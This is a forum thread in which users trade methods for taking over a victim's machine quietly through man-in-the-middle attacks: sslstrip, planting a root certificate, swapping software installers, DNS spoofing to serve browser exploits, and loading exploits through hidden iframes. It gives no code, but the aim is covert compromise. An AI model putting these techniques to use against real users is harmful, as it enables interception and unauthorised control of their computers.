Results 1 to 9 of 9

Thread: What is the least noisy MITM attack to take control of a box

  1. #1
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default What is the least noisy MITM attack to take control of a box

    There are many tuts & videos explaining the famous man-in-the-middle attack. However, except the sslstrip attack all of them (I think) require the victim to download something & run an exe (or other type) file. This is a bit "noisy". Is there ANY way which cause less suspicion? Say, for example, if the victim tries to go to google.com, it will redirect to fake (look alike) google.com and then "somehow" automatically install a backdoor or connect back to listening msf..... Well, you can ask - what do u mean by "somehow"? I don't know.. that's why I'm asking for help..
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  2. #2
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Browsers tend to crap themselves if you try to actually install something. You might get away with a java applet installed but they are sandboxed really damned well so I doubt the avenue is applicable. Your best bet would be some sort of active evilgrade attack, but digital signatures can be a problem.

    In terms of MiTM itself, the quietest ways are actually sslstrip and having a valid root certificate installed. I usually deploy a root cert out to my XP machines in the domain so that I can ettercap them at will without getting the giant "OMG IZ BAD!" alerts, but what happens after that can be more problematic.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  3. #3
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by Gitsnik View Post
    In terms of MiTM itself, the quietest ways are actually sslstrip and having a valid root certificate installed.
    Thanks.. sslstrip is helpful but it doesn't help to get access to the data in the actual box.
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

  4. #4
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    Location
    The Crystal Wind
    Posts
    851

    Default

    Quote Originally Posted by kazalku View Post
    Thanks.. sslstrip is helpful but it doesn't help to get access to the data in the actual box.
    No neither really will, evilgrading is your best bet but it's difficult to implement correctly. The problem really is that, even with abuse of trust in web browsers, there is really not much in the way of "download and run this .exe file" that goes on automatically (in a perfect browser world I mean). You *may* get away with MiTM'ing a citrix service (for example), but it is doubtful.

    It is not uncommon for me to manipulate pages on the fly and wait, if I expect my user to get after the latest nmap and I don't want him to have it, I manipulate the page he sees my modifying the md5 sum, and redirecting his .exe installer to my local server - really though this is just evilgrading anyway.
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

  5. #5
    Dooms_day
    Guest

    Default

    now when doing arp poison routing on a LAN, what steps do you go through to inject html into every page? its been said in the middle of other topics but i cant seem to find it, (seems on topic for this topic anyway)

    i think redirecting google to a mirror of google seems pretty silent, then use fast-track to do the mass browser exploitation of IE 7 (most 7331 browser eva)

  6. #6
    Member imported_vvpalin's Avatar
    Join Date
    Apr 2009
    Posts
    442

    Default

    lol please tell me you did not just put 1337 in you post ....

    But anyways do a dns spoofing attack on them and make a custom html page with both ie7 and ff3.5 exploit embedded inside.

    You could even try using the filters and injecting it that way .. it might not get everyone if they stay ontop of there updates, but it would probably get more people than you think.
    Using backtrack for the first time is like being 10 years old again with the keys to a Ferrari.

  7. #7
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default

    may want to look at the mass client side script for fasttrack.py and also my methods using smb_relay attack with etterfilter
    Own Full patched XP box via HTTP - Remote Exploit Forums
    Own Full patched XP box via HTTP - Remote Exploit Forums

  8. #8
    Dooms_day
    Guest

    Default

    aha i used an iframe to clone the real page while the exploit sits in the background, even if they goto another page, it continues to load the exploit on the first page, cause iframes rock!

    also better than a mirror because scripts dont work (php)

  9. #9
    Member kazalku's Avatar
    Join Date
    Feb 2009
    Posts
    416

    Default

    Quote Originally Posted by operat0r View Post
    may want to look at the mass client side script for fasttrack.py and also my methods using smb_relay attack with etterfilter
    Own Full patched XP box via HTTP - Remote Exploit Forums
    Own Full patched XP box via HTTP - Remote Exploit Forums
    That doesn't work anymore, already tested.

    Quote Originally Posted by Dooms_day View Post
    aha i used an iframe to clone the real page while the exploit sits in the background, even if they goto another page, it continues to load the exploit on the first page, cause iframes rock!

    also better than a mirror because scripts dont work (php)
    Can you point to any tutorial please.
    If you can't explain it simply, you don't understand it well enough -- Albert Einstein

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •